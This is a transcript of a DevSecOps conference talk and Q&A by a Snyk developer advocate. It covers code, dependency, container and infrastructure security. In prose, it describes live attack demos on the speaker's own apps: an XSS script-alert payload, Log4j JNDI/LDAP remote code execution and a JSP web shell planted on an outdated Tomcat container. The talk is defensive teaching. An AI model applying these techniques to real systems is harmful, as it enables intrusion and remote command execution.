Transcript
Vermeer: We need to talk about security. Let's talk DevSecOps, because we're all doing DevOps, and with DevOps, we try to tear down the wall between developers and the old fashioned operations organization. We're not throwing things over the wall. No, we're making sure that as a DevOps team, we create something and we own it, so that we can put it into production as a team, and if something goes wrong, it comes back to us. The only problem with that is that security is not yet part of that mindset. In many cases, the security team is still a separate team at the end of the pipeline. That means that security teams work for a lot of engineering teams, and these engineering teams are scaling like crazy, but security team is still one team. We think that making sure that the security mindset is part of the DevOps way of working, hence DevSecOps is a solution to make sure that if you build applications, and specifically cloud native applications, to make sure that you're secure from the beginning.
Background
My name is Brian Vermeer. I'm a senior developer advocate for Snyk. We do a lot of things about security, like we develop security tooling. I'm a Java champion. I do some stuff in the Java user groups. That's not why we're here.
Code
We're trying to solve a situation. How bad is that situation? Is it actually such an issue? Let's go into cloud native applications for a second. If you think about applications, a lot of folks focus on your code, the custom code that you wrote, and for a good reason, because that is the thing that makes the difference for that application. That is the business logic. However, if you look at the custom code, compared to the whole binary that you put into production, it's only 10% of the code. It's very important code, I get you. If we created code like I did here, I created an endpoint. What I did was I created an endpoint to do something, obviously. What I did here was I already created a security issue. Say, you're doing code reviews, or pair programming, or you're actually also looking if you introduced potential security risks. Because what I do here is, I have a request parameter in this controller, and that request parameter, user, I output it right away to the response writer. That means if I don't validate or sanitize that user input, it can be the topic of a cross-site scripting problem. For instance, if this would be the URL, I go to /hello, and put a script alert(1) in it, it will execute the script, and just give you an alert. It can be different, like sending vulnerable information to, for instance, a remote server. That's not what you want.
Of course, cross-site scripting can be more than just an alert, we can do things like mouse overs, and image sources to leverage cross-site scripting. You probably would have found this with good code reviews. This is an easy one. Think about it, are your developers aware enough of security to fix this with just a code review? Why not introduce tooling that can help you scan your code right away when you're making it before you put it even in your repository, for instance, on your local machine. Or once it's submitted, that it can be scanned, just to help you out that you're not introducing new code vulnerabilities. Then, we talked about code, but then there's a lot of things under the surface. Code is what we see in the code we wrote. In many places, in many ecosystems, we have dependencies, we depend on packages and frameworks from the outside world. These open source libraries and frameworks are roughly 80% to 90% of the code that you put into your binary and put into production. However, we don't look at them as vividly and as much as we do with our own code.
Say this is your application, this is the binary that you put into production. If you compare that to your own code, it's probably something like this. This is just a code that you put into production. We take that code that you wrote, we do code reviews, and QA, and all sorts of things on that. What about the rest? Do you have policies on when you include a new library? Do you scan it for potential problems? What if it's not used anymore, does it actually get out of the manifest file? Or, when does it get updated?
Open Source Usage Has Exploded
Uses of open source has exploded over the last decade or so, and for a good reason. Because as a developer, you don't want to pay your developers to do obvious stuff. If a library can do the heavy lifting for you, your developers can focus on what matters, and that is that 10% custom code. However, if there are open source libraries that are well known, well used, and there is a problem there, we have a potential pool of victims that can be extremely large. We have seen that. If you look at your manifest file, regardless of what ecosystem it is, but say, for instance, we take Maven Central, so the Java ecosystem and npm, in this case. This comes from our state of open source security. What you see is that it's not a top level thing that you actually pull into your application, no, but a framework depends on a library, depending on a library, and has several dependencies underneath, maybe four or five layers deep. Then, even without knowing, you might include something that can be vulnerable. If it's vulnerable, and you didn't know about it, then you could be the victim of a security breach. That's not what you want probably.
We've seen this happen just before, with Log4j, recently, December 2021. We saw that a lot of folks included Log4j as a dependency and used it without even knowing what version they're using. What we saw in our system is that 57% of the Snyk customers used Log4j as a transitive dependency, so didn't include it themselves but were using it because they were just part of a framework. We also saw that once this problem was disclosed, the first and major problem, over 17,000 Java packages were impacted because they depended on a small library like Log4j. Just a shout out to the folks of Log4j that they did an excellent job in intervening right away and fixing these things on the spot. In the first 72 hours when this vulnerability was publicly disclosed, we saw that over 800,000 attempts were made, and most of them were automatically.
Demo - Log4j Vulnerability
Let's quickly go into the Log4j issue. I will demo it to you. I have an application here I run on Java 8, build 111. If I try to log in with a wrong password, which is obviously wrong, you will see that in my log console, it gets logged as something wrong. I know that if I do something wrong, or a failed login attempt, it will get logged. That is what happens, because the problem is, if I do this string, I basically know with a vulnerable Log4j version that the string will be evaluated. Jndi request will be evaluated, and with jndi, you look up an object. I do this, and I call an LDAP server. I own that LDAP server, which currently is on my local host /Evil. What this does is it gives back a reference to an object and I actually give that object back to the application.
Let me show you what the code actually is. The object I returned, so I have the LDAP server, the LDAP server returns a request or a pointer, a reference to, in this case, an HTTP server that I spin up as well, and I own as well. Then that HTTP server returns this class, this compiled class. Because in a getObjectInstance, I call a runtime and I execute a command, I basically try to open my calculator. Nothing harmful on this side, but if I can open a calculator, I could do all sorts of terminal commands. Let's try this one. Let me spin up the server. I spin up the server, and you see I have this LDAP running at Port 999, and I have an HTTP server. The LDAP connects to the HTTP serving me. Finally, this unknown class that I had no clue of what it does, but if it comes in, I hope that it will run my calculator. Let's do this. By doing a wrong password, what you see is that my calculator here starts up and the server returned a LDAP reference, and then the HTTP returned a class, and I'm not even owning this class. I don't have it anywhere. Because I can do this and I know that the evaluation takes place, I can do a remote code execution.
Who Should Be Responsible for Security?
The million dollar question is, who's responsible for security? A lot of people think like developers, we are just creating. No, we're now doing DevOps, or, most definitely, we want to do DevSecOps. This means that we need to include that security mindset as a developer as well. That makes a lot of sense, because if I need to solve a problem, and I am the expert as a developer to do that, I create a solution by creating some code, or are pulling in some libraries to do the heavy lifting for me. We nowadays think of these solutions being scalable and maintainable, but we also need to think about secure from the beginning. If I have the responsibility of solving something, it should be the whole thing. Not just, yes, it works, so ship it. No. Yes, it works. If it's fast enough, can I scale it and is it secure? We should take our fair share, both in our software, but also in our infrastructure.
Containers
We talked about code. We talked about open source as part of your binary. Nowadays, we build cloud native applications, and these applications run in an environment, for instance, a container. Let's take a Docker container. The Dockerfiles that create these containers are now part of your Git repository, part of your code base. This is another thing because what we do is we base our images on top of other images. Look at your Dockerfile, the first line is probably from Ubuntu, or from Node.js. You base your stuff on top of another image. If we look at the images, and I did this research in 2019, and these were the 10 most commonly used base images from Docker App. We downloaded them at that point, and we scanned them for vulnerabilities. You see all of them had vulnerabilities. That is because these vulnerabilities were not so much in the Node.js image, but that Node.js image, for instance here is also based upon another image, the operating system. I just downloaded the latest image. In this case, it means that Node image is based upon a full blown Debian operating system. First of all, think about it, do you need a full blown operating system in your Docker image? Probably not. It gives you a lot of binaries that can potentially be vulnerable as well. We asked people, do you scan your Docker images for operating system vulnerabilities? A lot of people don't, because we're looking at the code and not so much the container or what's around that. Putting something in a container doesn't make it by default safe.
Todolist MVC
What can possibly go wrong when your application lives in a container? I have a Java application over here. The Java application is not really important because it lives inside a container. In this case, a container containing Tomcat, a well-known web server. However, it is an old Tomcat version. If you look at the Dockerfile, it would look something like this. My Dockerfile is here, and what you see is that it is based up, it is a multistage build. The final image that goes into production is based on Tomcat 8.5.21, which is somewhat old. The issue with this specific version is that it has a vulnerability. Let me go into that vulnerability. If you look at that vulnerability, it has a problem with JSP files. Let me go over here. It says it was possible to upload a JSP file to the server via a specially crafted request, the JSP could be requested and any code it contained would be executed by the server. This means regardless of the application, I can insert a JSP file, a Java Server Page file.
Let's go and see what exploit there is. There is one thing in the Exploit DB. Let me look at it. I will actually use this one to attack my own application. This is a Python script, it creates that specially crafted request. It has two steps. The first one is it tries to insert a JSP file with just this tag, which basically just outputs all A's, just to test if this application is actually vulnerable to the problem. Then the second one is because of this Tomcat application, I can insert a second JSP file containing this. This means I'm inserting a form, basically a text field and a button. Every time I hit the button, the command in the text field will get executed because I run the runtime and I execute it. This basically means I have a web shell. Let's try this one out. The application runs here, I don't need to touch it. The first poc.jsp with all A's doesn't yet exist. Let me go into my terminal. I packaged this exploit in a container containing Python. What I can do here, is say check, which does the first request. If I see it, it says poc.jsp. It's vulnerable. That means that if I go into my application, and now look at poc.jsp, all A's exist, so we can insert JSP files.
Let's do the second one. The second one over here, pwn.jsp doesn't exist yet. If I do this, uploading web shell, let's see what happens. If I go to pwn.jsp, I now have a web shell that runs inside this Docker container. I can ask, who am I? Basically, if you don't specify a specific user for a Docker container, but a lot of people unfortunately don't do, by default, it runs as root. That means I have root access. What's in this folder? I can do something with packages, maybe. Basically, I have a web interface, which is equal to a terminal. That is because you're running an application in a container containing the wrong or a vulnerable version of a base image. If I would have scanned this, like I did before with my scanner, I could have seen that there were problems like this. Maybe I have the scanner over here. I scanned my container, and I can see all the vulnerabilities my base image has. I also can see like, there are remediation possibilities. For instance, I'm now running on this 8.5.21, which I showed you, and I can update this base image to 8.5.70, which is the same Java Runtime Environment version 8 with less vulnerabilities. Trust me, that will also remediate this specific problem. Again, I'm not touching the application. I'm touching the container.
Infrastructure as Code
Last but not least, infrastructure as code. What we mean with that is your cluster. Nowadays, it's not just one container, you have a landscape or a cluster of containers, or things connected to each other using for instance, Kubernetes, or maybe Terraform to manage all of this. You need to manage them in the right way. First of all, you don't want by accident, giving some nodes or some pods, elevated privileges. Because if something goes wrong, it might backfire on you and have a domino effect. We need to take care of that as well, because once again, this is all part of your code base nowadays. We need to take care of all these things.
What Is the Solution?
What is the solution? The solution is basically three ways. First of all, culture. We need to do this. We need to want this. We need to be aware that this is a core value in our way of working. As a developer, I'm not just building things. Yes, that's my core thing to do. I'm building things. I need to be aware that building things is not just my only responsibility. I'm sharing the responsibility with my whole team. That means the security guy has the responsibility of not getting breached. If I'm not working and helping him out with that, we are clashing, and that will not work. Same thing as, for instance, if you work with a manager that just pushes you to create more features, and he wants that feature today. You can do that but you probably leave some technical debt. That's not a good thing if that piles up on each other. The same holds with security. We need to adopt security from the beginning and need to be aware that this is part of our way of thinking.
Then it's process. Don't just introduce a ton of more process, because you probably want people to adopt this. People have a way of working. Why not look at that way of working and see how you can integrate security maybe by automation or something, to help them in the way they work now. Tooling comes in place, because with the right tooling that fits your process instead of the other way around, you can help people out. For instance, if I can have scanning tools available on my local machine, for my developers to do this, while they're building their stuff, and they're unit testing, which is quite common, and they already scan the code and their open source dependencies. That makes sense, before they commit it to their Git repositories. It's not about tooling, these three are equally important. We need to take care of all of these.
DevSecOps: Continuous Security, Integrated Throughout DevOps
Snyk can always help you with the good tooling, in every place of this cloud native application security. Basically, we offer you a platform to do that. It's not about the tooling. It's to make sure that you also apply that tooling in every step of your software development lifecycle. While you're coding on your local machine, give your developers the ability to already pick up that stick and make sure that they don't introduce new stuff. If your code lives in a Git repository, scan it often because it might live there for a while. You probably have a CI based system, so integrate scanning over there to make sure that when you go to production, it is ok. When you go to production, you need to take care of that as well, because most people think, ok, we're done. Security and security vulnerabilities are getting found over time. What is safe today, might not be safe a week from now. If something goes wrong, you want to be pinged, you want to be chimed in, like, "You're using this library, or you're using this Docker image, and there is a new vulnerability found," so you have at least the knowledge to act accordingly. We say, why not monitor these things? Of course, we can help you with that. You need to be aware that you need to do this. You're not done when you're going to production.
Shift Left Is Not Enough
A lot of people tell us to shift left and what they mean with shift left is you need to start at the beginning of that previous slide that I showed you, at the local machine of the developers. Shifting left is not a thing in a continuous process, there is simply no left. It basically says that shifting left is not enough. You need to do this in every stage of your development lifecycle because it comes back over again. Software development doesn't have a defined beginning and a defined end, in most cases. If you do this early and often, you will find your vulnerabilities and your problems fast or fast enough so you can intervene whenever this is needed.
Questions and Answers
Losio: First of all, I'm a developer. I'm coming from a developer background, Java developer background, you say, ok, we say now you're not a developer anymore, you're DevOps, now it's DevSecOps, whatever, we add something else. I've already a lot on my plate as a developer, I have many responsibilities. How do I scale security in a development team?
Vermeer: That's the main question. That's a difficult one. Let's say, in some companies, the people used DevOps to get rid of a few people, so we can do the same with less. That's what happened. If you look at DevOps, it's owning what you create. It's not throwing it over the wall anymore. Security should be part of that. Before we went to cloud services, we had everything on our local machine, we thought way different about scalability and maintainability. Now we need to do a million requests per second, and maybe 10 years ago, it was just 100 requests. That is implicitly already in our thing. That is also how we should do as developers. The problem you see is that there's probably one security team and there are 10 development teams, and a year from now there will probably be 15 or 20 development teams but still one security team. That is not scalable. What we did with DevOps was more or less, try to get the operations person out of the operations team and make sure that he was part of the development team, or at least somebody knew enough to get going. That is the thing, to get going. You don't need to replace the security expert in the security team.
Let's say we have one person or a few people that have security knowledge to a certain extent, so that within these guardrails, they can operate freely. If you say, ok, I find an image that has so many vulnerabilities, I don't know. Then go to the security team. For all the easy things, the most common things, make sure that there is knowledge within the team. That means from the security team, you need to make sure that you educate, that somebody at least in a team is educated enough to make the obvious security decisions. Because for developers, security is not always obvious. The other way around, if you don't know that there needs to be an open door always to connect with a security team. Some people call it security championing so that there's one person in that team that carries this.
Losio: I would like actually to follow up on this, I'm thinking a bit, going back as well to the example you did with Log4j. I go back to the end of 2021, is that famous weekend, Friday night, whatever it was. I can read the news. I'm a developer. I am a senior developer, I have some stuff in production. I'm not a security guy. I'm not the person in charge of it. I read the news it's like, that's Log4j, maybe it's the version that is affected, or maybe I'm using a library that is using another library that is using something else that is affected. I start to receive some email from management or whatever saying, are we affected? What should you do apart from reading the news, and shut down everything?
Vermeer: I absolutely agree with you. The first thing, what I should do is make sure that your application is scanned on a continuous basis. Once this is known, you get automatically connected. That's the first thing. Because if you don't know, then you're already in and people might already be in your application. That's the first. Secondly, and that's a bigger process, you need to look at your application, how you release your whole cycle, to see if you actually can intervene. If I release three times a year, then I cannot intervene. That is already a step ahead. From the architecture on, it must be that small or that rigid, that once there is a problem, I can create a new version, and be able to release it right away and roll it out to my customers. If not, we should be able to stop it. Log4j was an example, if you are connected to the outside world, stop it.
Next, know what you're actually getting into. As a developer, while you're developing, what we do is like, I need this library, and probably it's a package that brings in tens or maybe hundreds of other packages underneath specifically in other ecosystems like npm, where we have a lot of smaller packages. Do you actually know what's in there? If you want to know, maybe there's a thing, like for Java, you use Maven or Gradle. You can run out your dependency tree to see if it's actually going there. If you go on and deliver that software to a client and you're using that software, and the client asks like, am I vulnerable? You can generate something like an SBOM, which is a software bill of material, which basically says, my software is built upon these kinds of packages, which is generally a printout of your, whatever it is in your manifest file, your Maven file, and underneath. You can see what actually is going on.
If you're using Maven, or Gradle, or npm, there are commands or plugins available that you can just print out your whole dependency tree. What is actually in that binary that you put in, and then you can see, ok, it's in there. Maybe I can change it out. My company is the one that gives you some tooling and that can scan it for you. Is there tooling? Yes. Snyk can provide you this tooling. What we can do is, for instance, for these manifest files, we scan them in your GitHub repository. If you connect your GitHub repository, we scan them on a daily basis, or you can scan them on your local machine. If we found a vulnerable problem in that package or the transitive packages, we can say, if you upgrade to this version, you get rid of x amount of vulnerabilities. That is helpful.
Losio: In that sense, who do you see as responsible then on that part? It is the specific team, what you call a security champion, or it's more like the main security guy in the company that follows up on that.
Vermeer: In the end, it is a shared responsibility. Log4j was a Zero-Day. It came in, everybody at that point was vulnerable. At that point, everybody was vulnerable, unless you updated right away to the newer version that was just released. In many cases, what you see, if I go as a consultant to a company, you see that people have a large application that is built over years, and new features are built on top of all the features. There are actually packages in that are never updated. People have actually no clue of the packages used. Start with that. Basically, it's the Boy Scout rule, make sure that your desk is clean, just like your code. Then you're already a step ahead. Then a Zero-Day comes in, then it's probably if you updated to, not the last but almost last version, then the delta between what you need to update to, and what you have is smaller. If you leave that gap open, that depends, then APIs could change and things could break, and then you're not in that span of control that you can actually release a version right away. Update early and often, even if it's not vulnerable is, in my opinion, a good solution. Yes, that means you have to have a good test strategy, and so forth.
Losio: I fully agree with that. I share the pain of what you mentioned, like external company, whatever, but even internal company. You might be in the scenario where, like in your example of Tomcat 8.5, minor version, that is up to date. I might be in a company, I might be in a problem that I'm aware that we have that problem, or that we have Tomcat or whatever else that is not up to date, but I have no control myself. It's out of my scope as a developer, I cannot fix it myself. What should the approach be? Is it always a team champion that scales up to the security, and helps out another team?
Vermeer: There's no silver bullet. This depends on context of your company. I was in a company and this happened in teams that I worked in before. I've worked at banks and government agencies here in the Netherlands, and we couldn't upgrade to the newer version of, for instance, say Spring Boot. Escalate it. If you escalate, then you have the data that you say, we are using a vulnerable version, is that what we want? If it's a vulnerable version that has a high severity that actually has exploits available, I think you have a case. Then you should bring it up to the team, bring it up definitely to the security team, because probably the security team, if they find out there will say, ok, we need to do this. More or less, it's, in many cases, the other way around that security team is bugging the developers. If I as the developer find something and I cannot update it, I would definitely go to the security team, either my security champion in my team or directly to the security team, make sure that mitigation, and security is one of your core values, just like scalability and maintainability is.
Losio: What about the people who test the development? In what parts of the process are they involved? The developer should not code and test their own systems. I wonder if you have a strong position in that.
Vermeer: That developers should not test their own code? That's again, in utopia, definitely. It depends on how you work, if you fully work test driven, then I wouldn't say it's a problem. However, then it's all about how are you dealing with code? Let's get back to not even testing, but code reviewing. Do you review the test, for instance? Do the tests make sense? How much time do you give your reviewer to actually review? Is that the same amount of hours you spend on creating the feature and the tests, or not? Is it feasible for every step of the way to have a test unit test your stuff? Depends. If it's a small service, you might say, unit testing is up to the developers. Integration testing is something we want to do with a test lead or something like that. That, again, depends if you are maintaining as a small team, a small application, a big application, a chunk of applications, a cluster of applications. What is in your span of control? Because if you're in control of the whole cluster, then it's quite easy to do integration testing. If you're just in control of one item in the cluster, then you need to have contracts or something like that. Then we go into a whole different landscape of how you should test, and that is not my expertise. You see how difficult these things are? You can do the same with security, though. It's a shared responsibility for the whole team and the whole company, and we should take care of that. That's basically the main message here.
Losio: I will go back to the Log4j, because there was another side of the question that I'm very interested in. Let's go back to day zero, and let's forget one second Log4j because that's such a big one that basically even if you didn't have any tool or process in place, as long as you were reading the news, you will figure it out that there was a problem, a serious problem out there. Let's say you have something, like in that case, your scanning tool, whatever tool you're using doesn't identify until that Zero-Day, because it was not there, nothing happened. What other approaches can I have to track this problem, and to be aware of this problem? Who should it be? As a developer, should I really care or I leave it to the security guy? Is there a newsletter, monitoring tool, notification tool, but strategies in general?
Vermeer: Yes. For the Log4j it was obvious, because it was in the news. That is like the one in a million that is so big that it becomes news. The last one we had this big was I think 2017, Struts 2, Equifax, that one was a major one. In between there are trillions of packages. That is why we come back to that process and tooling. Depending on your process, I would implement tooling to do the scanning for you on such a regular basis that it's comfortable for your team and company to intervene if you find something. If you say like, there is something out and your tool doesn't find it yet, then I would connect with the company that makes that tool to say, I heard this. How important is this? Because there can be reasons. For instance, in some cases, some vulnerabilities are not that bad, but just a bit hyped up. The Log4j one that I showed you was the first one, but after that there were three or four more. If you look at them closely, yes, they were vulnerabilities. Don't get me wrong. Most of these vulnerabilities, then you already had to have access to the configuration, change the configuration into some way, then it can be executable. If somebody can already access my configuration, I have a whole different problem. Or, I basically have people that don't know how to configure this stuff. This configuration at this point was so specific, that they were not as big as the giant first Log4j problem. It depends.
Losio: There's the ideal world that we can do everything ideally, but it is cost prohibitive to follow up any update, any dependency. Having something in front, whatever is viral, whatever else, sanitize your input can help.
See more presentations with transcripts